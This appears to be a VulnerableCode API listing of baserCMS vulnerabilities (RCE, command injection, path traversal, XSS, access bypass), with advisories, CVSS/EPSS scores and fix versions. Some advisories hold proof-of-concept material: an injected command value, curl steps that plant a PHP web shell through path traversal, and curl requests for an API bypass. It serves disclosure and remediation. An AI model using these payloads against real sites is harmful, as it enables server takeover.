Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:composer/baserproject/basercms@5.0.0-beta1
Typecomposer
Namespacebaserproject
Namebasercms
Version5.0.0-beta1
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version5.2.3
Latest_non_vulnerable_version5.2.3
Affected_by_vulnerabilities
0
url VCID-3new-f12y-8bf9
vulnerability_id VCID-3new-f12y-8bf9
summary 
baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)
### Details
The application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.

Vector: Malicious ZIP upload + insecure `require_once`

### PoC
1. Restore backup
   ![image](https://github.com/user-attachments/assets/9e59768a-4a8e-472d-aaef-5d54546080f6)
1. Load file shell (insecure `require_once`)
   ![image](https://github.com/user-attachments/assets/8f7919a2-c7f3-4ae1-af6c-1b0057e4ba22)
   ![image](https://github.com/user-attachments/assets/c10ef049-459d-429e-a608-8fb220c3387f)

### Impact
Remote Code Execution (RCE)
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
reference_id
reference_type
scores
0
value 0.00031
scoring_system epss
scoring_elements 0.09459
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
6
reference_url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
reference_id GHSA-hv78-cwp4-8r7r
reference_type
scores
url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2025-32957, GHSA-hv78-cwp4-8r7r
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9
1
url VCID-4zw8-truk-pugf
vulnerability_id VCID-4zw8-truk-pugf
summary 
baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)
## Summary

In the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.

This vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.

---

## Vulnerability Information

| Item | Details |
| ---- | ------- |
| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |
| Impact | Remote Code Execution (RCE) |
| Severity | Critical |
| Attack Requirements | Administrator privileges required |
| Reproducibility | Reproducible (confirmed multiple times) |
| Test Environment | baserCMS 5.2.2 (Docker / development environment) |

---

## Affected Areas

- **Controller**
  - `PluginsController::get_core_update()`
- **Service**
  - `PluginsService::getCoreUpdate()`
- **Affected Endpoint**
  - `/baser/admin/baser-core/plugins/get_core_update`

---

## Technical Details

### Vulnerable Code Flow

```text
PluginsController::get_core_update()
  ↓ Retrieves php parameter from POST data
PluginsService::getCoreUpdate($targetVersion, $php, $force)
  ↓ Concatenates $php into command string without validation or escaping
exec($command)
```

### Relevant Code (Excerpt)

**PluginsController.php**

```php
$service->getCoreUpdate(
    $request->getData('targetVersion') ?? '',
    $request->getData('php') ?? 'php',
    $request->getData('force'),
);
```

**PluginsService.php**

```php
$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .
           $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';

exec($command, $out, $code);
```

The `$php` parameter is user input, and **none** of the following countermeasures are in place:

- Restriction via allowlist
- Validation via regular expression
- Escaping via `escapeshellarg()` or similar

---

## Attack Scenario

1. The attacker logs in as a CMS administrator
2. Sends a POST request to the core update functionality in the admin panel
3. Specifies a string containing OS commands in the `php` parameter
4. `exec()` is executed on the server side, running the arbitrary OS command

### Example Attack Input (Conceptual)

```text
php=php;id>/tmp/rce_test;#
```

---

## Verification Results (PoC)

### Execution Result

```bash
$ docker exec bc-php cat /tmp/rce_test
uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)
```

The above confirms that OS commands can be executed with `www-data` privileges.

### Additional Notes

- Reproducible through the legitimate flow in the admin panel (browser)
- Succeeds even with CSRF/FormProtection tokens included in a legitimate request
- Failure cases (400/403) have also been investigated and differentiated
- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)

---

## Impact

If this vulnerability is exploited, the following becomes possible:

- Retrieval of server information
- Reading/writing arbitrary files
- Retrieval of application configuration information (DB credentials, etc.)
- OS-level operations beyond application permission boundaries

Although administrator privileges are required, **this is a design issue where the impact extends from the application layer to the OS layer**, and the impact is considered significant.

---

## Recommended Fix

### Primary Recommendation

- Do not accept the PHP executable path from user input
- Fix the PHP executable on the server side using the `PHP_BINARY` constant

```php
$php = escapeshellarg(PHP_BINARY);
```

### Supplementary Fix Recommendations

- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well
- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)

### Alternative (Not Recommended)

- Allowlist validation for the PHP executable path
- Combined use of regex validation and `escapeshellarg()`

However, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.

---

## Additional Notes

- This issue is independent of UI display controls (showing/hiding buttons)
- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed
- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone

---

## Conclusion

Due to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
reference_id
reference_type
scores
0
value 0.00131
scoring_system epss
scoring_elements 0.32198
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
6
reference_url https://github.com/advisories/GHSA-qxmc-6f24-g86g
reference_id GHSA-qxmc-6f24-g86g
reference_type
scores
url https://github.com/advisories/GHSA-qxmc-6f24-g86g
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-21861, GHSA-qxmc-6f24-g86g
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf
2
url VCID-7x3n-4c2b-nfbx
vulnerability_id VCID-7x3n-4c2b-nfbx
summary 
baserCMS has OS command injection vulnerability in installer
baserCMS has an OS command injection vulnerability in the installer.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

If baserCMS is placed on a server but not installed, malicious commands may be executed.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_54513170

### Credits

REN XINGDIAN
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
reference_id
reference_type
scores
0
value 0.00055
scoring_system epss
scoring_elements 0.17526
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
6
reference_url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
reference_id GHSA-6hpg-8rx3-cwgv
reference_type
scores
url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30880, GHSA-6hpg-8rx3-cwgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx
3
url VCID-8buz-nsr9-3yge
vulnerability_id VCID-8buz-nsr9-3yge
summary 
baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API
## Summary

A path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.

An authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).

## Affected Code

**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`

```php
public function getFullpath(string $theme, string $plugin, string $type, string $path)
{
    // ...
    return $viewPath . $type . DS . $path;  // $path is not sanitized
}
```

## Attack Scenario

1. The attacker compromises an administrator account (password leak, brute force, etc.)
2. Obtains an access token via API login
3. Specifies `path: "../../../../webroot/"` in the theme file creation API
4. A PHP file is created in the webroot
5. The attacker accesses the created PHP file to achieve RCE

## Reproduction Steps

```bash
# 1. Login
curl -X POST "http://target/baser/api/admin/baser-core/users/login.json" \
  -H "Content-Type: application/json" \
  -d '{"email":"admin@example.com","password":"password"}'

# 2. Create webshell
curl -X POST "http://target/baser/api/admin/bc-theme-file/theme_files/add.json" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{
    "theme": "BcThemeSample",
    "plugin": "",
    "type": "layout",
    "path": "../../../../webroot/",
    "base_name": "shell",
    "ext": "php",
    "contents": "<?php system($_GET[\"cmd\"]); ?>"
  }'

# 3. RCE
curl "http://target/shell.php?cmd=id"
```

## Vulnerability Details

| Item | Details |
|------|---------|
| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |
| Impact | Arbitrary file write, Remote Code Execution (RCE) |
| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |
| Reproducibility | High (PoC verified) |
| Test Environment | baserCMS 5.x (Docker environment) |

### Additional Notes on Attack Prerequisites

- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.
- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.

## Recommended Fix

Rather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected.

The specific implementation location and method are left to the project's design decisions.

## Comparison with Other CMS

WordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. [CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.

This vulnerability is not a matter of "administrators being able to execute arbitrary code" by design, but rather stems from a security boundary violation where "the theme editing function can write outside the theme directory (to webroot, config, etc.)."

## Resources

- OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal>
- WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/>
- Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
reference_id
reference_type
scores
0
value 0.00145
scoring_system epss
scoring_elements 0.34571
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
6
reference_url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
reference_id GHSA-c5c6-37vq-pjcq
reference_type
scores
url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30940, GHSA-c5c6-37vq-pjcq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge
4
url VCID-8ssu-umet-37bk
vulnerability_id VCID-8ssu-umet-37bk
summary 
baserCMS is Vulnerable to Cross-site Scripting
baserCMS has DOM-based cross-site scripting in tag creation.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability
 Malicious JavaScript may be executed when creating a tag.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_94952030

### Credits

- quanlna2 (Le Nguyen Anh Quan)
- namdi (Do Ich Nam)
- minhnn42 (Nguyen Ngoc Minh)
- VCSLab - Viettel Cyber Security
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
6
reference_url https://github.com/advisories/GHSA-677c-xv24-crgx
reference_id GHSA-677c-xv24-crgx
reference_type
scores
url https://github.com/advisories/GHSA-677c-xv24-crgx
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-32734, GHSA-677c-xv24-crgx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk
5
url VCID-d1sf-cmct-zbh1
vulnerability_id VCID-d1sf-cmct-zbh1
summary 
baserCMS has Mail Form Acceptance Bypass via Public API
### Summary
A public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.

### Details
In baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).

These checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()`  
(e.g. `plugins/bc-mail/src/Controller/MailController.php`).

However, the public API endpoint:

`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`

does not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.

The endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.

### PoC
1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).
2. Obtain a CSRF cookie by accessing the site root:
```
curl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'
```
3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:
```
curl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' 
-H 'Content-Type: application/x-www-form-urlencoded' 
-H 'Referer: http://localhost/' 
-H 'X-CSRF-Token: <csrf-token-from-cookie>' 
-b /tmp/basercms_cookies.txt 
--data-urlencode 'name_1=Test' 
--data-urlencode 'name_2=User' 
--data-urlencode 'email_1=test@example.com' 
--data-urlencode 'email_2=test@example.com' 
--data-urlencode 'category[]=資料請求' 
--data-urlencode 'root=検索エンジン' 
--data-urlencode 'message=API bypass test'
```
4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.

### Impact
This is an access control / business logic bypass vulnerability.

Administrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
reference_id
reference_type
scores
0
value 0.0002
scoring_system epss
scoring_elements 0.05615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
6
reference_url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
reference_id GHSA-8cr7-r8qw-gp3c
reference_type
scores
url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30878, GHSA-8cr7-r8qw-gp3c
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1
6
url VCID-ggv8-3v9t-mfea
